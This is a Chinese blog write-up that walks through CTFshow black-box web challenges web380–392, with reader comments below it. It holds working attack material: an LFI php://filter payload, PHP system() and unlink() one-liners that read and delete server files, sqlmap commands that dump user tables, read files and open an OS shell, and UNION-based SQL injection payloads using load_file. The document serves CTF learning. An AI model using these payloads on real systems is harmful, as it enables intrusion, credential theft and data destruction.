【原创】CTFshow—黑盒测试

[huayang]

简单来说就是用前面所学过的知识测试当前网站

web380

暴躁羽师傅

提示id参数打开失败

我们随便定义一个

通过伪协议读取一下page

进行base64编码再试试

page.php?id=php://filter/convert.base64-encode/resource=page

文件包含

view-source:http://d491207b-62d2-47f5-a91a-08ade150c921.chall.ctf.show:8080/page.php?id=flag

web381

没sql

web382-383

还是上面的那个页面

拿字典扫一下

ctfshow{a676da58-a112-4416-8dfb-03173ed663a0}

web384

很明显自己写脚本

import string
letter = string.ascii_lowercase
number = string.digits
f=open('dict.txt','w')
for a in letter:
	for b in letter:
		for c in number:
			for d in number:
				for e in  number:
					p = a + b + c + d + e
					f.write(p + "\n")
f.close()

数目过多必须写在文件上才行

admin
xy123

太多了没爆

web385

弱口令试试

web386

 python3 dirsearch.py -u http://05da4262-8cfe-4d32-9587-3a9a1477d20b.chall.ctf.show:8080/ -t 50 

-t为线程数

猜一下input

把这个文件删了就和上面一样啦

方法二

看看别的目录

比如这样

转码看看

import requests
response = requests.get('http://f96b10ac-ac85-437d-b0b9-451c3937cf09.chall.ctf.show:8080/layui/css/tree.css')
response.encoding = 'utf-8'
print(response.text)

web387

目测文件包含

写一句话

貌似不行

看看目录

<?php system('ls');?>

上一级

这个alsckdfy是不是很熟悉,看看上一题的flag

有了路径直接读源码

<?php system('cat ../alsckdfy/check.php');?>

方法二

直接写命令删除

<?php unlink('/var/www/html/install/lock.dat')?>

直接删lock.dat

后面操作就一样啦

web388

非预期

要用到写入的方式查看

<?php system('cat ../alsckdfy/check.php > /var/www/html/1.txt');?>

预期解

https://www.bilibili.com/video/BV16A411W7GP

web389

和上题差不多但要用到jwt提权

不懂的看前面的文章

至于为什么是123456,懂的都懂(jwt专题有)

web390

存在sql注入,直接一梭子

name

py sqlmap.py -u a10a1606-7061-47aa-b904-53ad9645414e.chall.ctf.show:8080/page.php?id=1 -D ctftraining -T users -C username --dump --batch

password

py sqlmap.py -u a10a1606-7061-47aa-b904-53ad9645414e.chall.ctf.show:8080/page.php?id=1 -D ctftraining -T users -C password --dump --batch

拒绝登陆???给爷逗笑了

还有一组

name

py sqlmap.py -u a10a1606-7061-47aa-b904-53ad9645414e.chall.ctf.show:8080/page.php?id=1 -D ctfshow -T admin_user -C unsername  --dump  --batch

password

py sqlmap.py -u a10a1606-7061-47aa-b904-53ad9645414e.chall.ctf.show:8080/page.php?id=1 -D ctfshow -T admin_user -C password  --dump  --batch

虽然无法登陆但知道了表和字段名

手注

union select 1,(select username from admin_user),(select password from admin_user) limit 1,1#

可以看见用户名和密码

读取文件

union select 1,(select username from admin_user),(select load_file('/var/www/html/alsckdfy/check.php'))limit 1,1#

使用substr()截取前面的信息

union select 1,(select username from admin_user),substr((select load_file('/var/www/html/alsckdfy/check.php')),1,255)limit 1,1#

方法二

还是用羽师傅的方法

py sqlmap.py -u a10a1606-7061-47aa-b904-53ad9645414e.chall.ctf.show:8080/page.php?id=1 --file-read /var/www/html/alsckdfy/check.php --batch

文件将会保存在本地文件夹内

web391

手注

看看回显点

这次我们用order by

1' union select 1,2,3 order by 1%23

因为是搜索框那就是字符型啦

#要经过编码才能执行成功或是用不用转码的–+

老样子(虽然没任何卵用)看看admin和user

1' union select 1,(select username from admin_user),(select password from admin_user)order by 1%23
1' union select 1,(select username from admin_user),(load_file('/var/www/html/alsckdfy/check.php'))order by 1%23

可以写那就和上题一样咯

1' union select 1,(select username from admin_user),substr((load_file('/var/www/html/alsckdfy/check.php')),1,255)order by 1%23

sqlmap

和上题一样位置变为了搜索框

py sqlmap.py -u http://7af0e671-1ccd-4315-b228-1d2fb702a75c.chall.ctf.show:8080/search.php?title=1 --file-read /var/www/html/alsckdfy/check.php --batch

web392

这题用linux命令执行

找到注入点和上面一样

py sqlmap.py -u http://1f19b92b-4459-4277-9cdf-d170b5a2d99f.chall.ctf.show:8080/search.php?title=1 --os-shell --batch

看看根目录

ls /
cat /flag

手注

和上题一样

不知道flag还是不容易做出来

马后炮

1' union select 1,(select username from admin_user),substr((load_file('/flag')),1,255)order by 1%23

[/huayang]

==>转载请注明来源哦<==

评论

  1. 头像
    Lxx
    Windows Chrome
    7月前
    2021-6-21 15:13:30

    看看

  2. 华扬
    华扬 博主
    11月前
    2021-3-13 9:01:20

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇